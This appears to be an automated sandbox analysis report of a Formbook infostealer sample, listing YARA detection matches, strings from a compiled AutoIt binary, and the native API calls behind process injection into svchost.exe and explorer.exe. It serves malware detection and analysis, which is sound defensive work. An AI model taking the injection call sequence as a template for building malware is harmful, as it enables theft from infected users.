          Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: janacourse2.1.exe PID: 7340, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 7356, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: explorer.exe PID: 7428, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: janacourse2.1.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: janacourse2.1.exe, 00000000.00000000.1640059570.0000000001072000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a5b0a271-1
          Source: janacourse2.1.exe, 00000000.00000000.1640059570.0000000001072000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_59d6fe3f-5
          Source: janacourse2.1.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_89bff2d8-b
          Source: janacourse2.1.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f7c3bcff-e
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A330 NtCreateFile,1_2_0041A330
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A3E0 NtReadFile,1_2_0041A3E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A460 NtClose,1_2_0041A460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A510 NtAllocateVirtualMemory,1_2_0041A510
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A32C NtCreateFile,1_2_0041A32C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A383 NtCreateFile,1_2_0041A383
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A45A NtClose,1_2_0041A45A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A50A NtAllocateVirtualMemory,1_2_0041A50A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A58A NtAllocateVirtualMemory,1_2_0041A58A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A58C NtAllocateVirtualMemory,1_2_0041A58C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472B60 NtClose,LdrInitializeThunk,1_2_03472B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BF0 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_03472BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AD0 NtReadFile,LdrInitializeThunk,1_2_03472AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F30 NtCreateSection,LdrInitializeThunk,1_2_03472F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472FE0 NtCreateFile,LdrInitializeThunk,1_2_03472FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F90 NtProtectVirtualMemory,LdrInitializeThunk,1_2_03472F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472FB0 NtResumeThread,LdrInitializeThunk,1_2_03472FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472E80 NtReadVirtualMemory,LdrInitializeThunk,1_2_03472E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_03472EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D10 NtMapViewOfSection,LdrInitializeThunk,1_2_03472D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D30 NtUnmapViewOfSection,LdrInitializeThunk,1_2_03472D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DD0 NtDelayExecution,LdrInitializeThunk,1_2_03472DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03472DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CA0 NtQueryInformationToken,LdrInitializeThunk,1_2_03472CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03474340 NtSetContextThread,1_2_03474340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03474650 NtSuspendThread,1_2_03474650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BE0 NtQueryValueKey,1_2_03472BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472B80 NtQueryInformationFile,1_2_03472B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BA0 NtEnumerateValueKey,1_2_03472BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AF0 NtWriteFile,1_2_03472AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AB0 NtWaitForSingleObject,1_2_03472AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F60 NtCreateProcessEx,1_2_03472F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472FA0 NtQuerySection,1_2_03472FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472E30 NtWriteVirtualMemory,1_2_03472E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472EE0 NtQueueApcThread,1_2_03472EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D00 NtSetInformationFile,1_2_03472D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DB0 NtEnumerateKey,1_2_03472DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C60 NtCreateKey,1_2_03472C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C70 NtFreeVirtualMemory,1_2_03472C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C00 NtQueryInformationProcess,1_2_03472C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CC0 NtQueryVirtualMemory,1_2_03472CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CF0 NtOpenProcess,1_2_03472CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473010 NtOpenDirectoryObject,1_2_03473010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473090 NtSetValueKey,1_2_03473090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034735C0 NtCreateMutant,1_2_034735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034739B0 NtGetContextThread,1_2_034739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473D70 NtOpenThread,1_2_03473D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473D10 NtOpenProcessToken,1_2_03473D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,1_2_032DA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA042 NtQueryInformationProcess,1_2_032DA042
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5BAE12 NtProtectVirtualMemory,2_2_0E5BAE12
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5B9232 NtCreateFile,2_2_0E5B9232
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5BAE0A NtProtectVirtualMemory,2_2_0E5BAE0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_04B22CA0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04B22C70
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22C60 NtCreateKey,LdrInitializeThunk,3_2_04B22C60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_04B22DF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22DD0 NtDelayExecution,LdrInitializeThunk,3_2_04B22DD0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22D10 NtMapViewOfSection,LdrInitializeThunk,3_2_04B22D10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_04B22EA0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22FE0 NtCreateFile,LdrInitializeThunk,3_2_04B22FE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22F30 NtCreateSection,LdrInitializeThunk,3_2_04B22F30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22AD0 NtReadFile,LdrInitializeThunk,3_2_04B22AD0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_04B22BF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22BE0 NtQueryValueKey,LdrInitializeThunk,3_2_04B22BE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22B60 NtClose,LdrInitializeThunk,3_2_04B22B60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B235C0 NtCreateMutant,LdrInitializeThunk,3_2_04B235C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B24650 NtSuspendThread,3_2_04B24650
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B24340 NtSetContextThread,3_2_04B24340
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22CF0 NtOpenProcess,3_2_04B22CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22CC0 NtQueryVirtualMemory,3_2_04B22CC0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22C00 NtQueryInformationProcess,3_2_04B22C00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22DB0 NtEnumerateKey,3_2_04B22DB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22D30 NtUnmapViewOfSection,3_2_04B22D30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22D00 NtSetInformationFile,3_2_04B22D00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22E80 NtReadVirtualMemory,3_2_04B22E80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22EE0 NtQueueApcThread,3_2_04B22EE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22E30 NtWriteVirtualMemory,3_2_04B22E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22FB0 NtResumeThread,3_2_04B22FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22FA0 NtQuerySection,3_2_04B22FA0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22F90 NtProtectVirtualMemory,3_2_04B22F90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22F60 NtCreateProcessEx,3_2_04B22F60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22AB0 NtWaitForSingleObject,3_2_04B22AB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22AF0 NtWriteFile,3_2_04B22AF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22BA0 NtEnumerateValueKey,3_2_04B22BA0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B22B80 NtQueryInformationFile,3_2_04B22B80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B23090 NtSetValueKey,3_2_04B23090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B23010 NtOpenDirectoryObject,3_2_04B23010
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B23D10 NtOpenProcessToken,3_2_04B23D10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B23D70 NtOpenThread,3_2_04B23D70
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B239B0 NtGetContextThread,3_2_04B239B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029EA3E0 NtReadFile,3_2_029EA3E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029EA330 NtCreateFile,3_2_029EA330
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029EA460 NtClose,3_2_029EA460
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029EA510 NtAllocateVirtualMemory,3_2_029EA510
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029EA383 NtCreateFile,3_2_029EA383
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029EA32C NtCreateFile,3_2_029EA32C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029EA45A NtClose,3_2_029EA45A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029EA58C NtAllocateVirtualMemory,3_2_029EA58C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029EA58A NtAllocateVirtualMemory,3_2_029EA58A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029EA50A NtAllocateVirtualMemory,3_2_029EA50A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_0499A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,3_2_0499A036
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04999BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,3_2_04999BAF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_0499A042 NtQueryInformationProcess,3_2_0499A042
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04999BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_04999BB2
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0101D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0101D5EB
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_01011201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_01011201
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0101E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0101E8F6
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FB80600_2_00FB8060
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_010220460_2_01022046
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_010182980_2_01018298
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FEE4FF0_2_00FEE4FF
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FE676B0_2_00FE676B
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_010448730_2_01044873
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FBCAF00_2_00FBCAF0
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FDCAA00_2_00FDCAA0
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FCCC390_2_00FCCC39
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FE6DD90_2_00FE6DD9
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FB91C00_2_00FB91C0
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FCB1190_2_00FCB119
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FD13940_2_00FD1394
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FD17060_2_00FD1706
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FD781B0_2_00FD781B
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FD19B00_2_00FD19B0
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FC997D0_2_00FC997D
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FB79200_2_00FB7920
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FD7A4A0_2_00FD7A4A
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FD7CA70_2_00FD7CA7
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FD1C770_2_00FD1C77
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FE9EEE0_2_00FE9EEE
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0103BE440_2_0103BE44
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_00FD1F320_2_00FD1F32
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_014DC0080_2_014DC008
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041EDDB1_2_0041EDDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409E5C1_2_00409E5C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409E601_2_00409E60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041DF131_2_0041DF13
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E7A41_2_0041E7A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA3521_2_034FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F01_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035003E61_2_035003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E02741_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C02C01_2_034C02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C81581_2_034C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034301001_2_03430100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA1181_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F81CC1_2_034F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F41A21_2_034F41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035001AA1_2_035001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D20001_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034647501_2_03464750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034407701_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343C7C01_2_0343C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345C6E01_2_0345C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034405351_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035005911_2_03500591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F24461_2_034F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E44201_2_034E4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EE4F61_2_034EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FAB401_2_034FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F6BD71_2_034F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA801_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034569621_2_03456962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A01_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350A9A61_2_0350A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344A8401_2_0344A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428401_2_03442840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E8F01_2_0346E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034268B81_2_034268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4F401_2_034B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03482F281_2_03482F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460F301_2_03460F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E2F301_2_034E2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432FC81_2_03432FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BEFA01_2_034BEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440E591_2_03440E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FEE261_2_034FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FEEDB1_2_034FEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452E901_2_03452E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FCE931_2_034FCE93
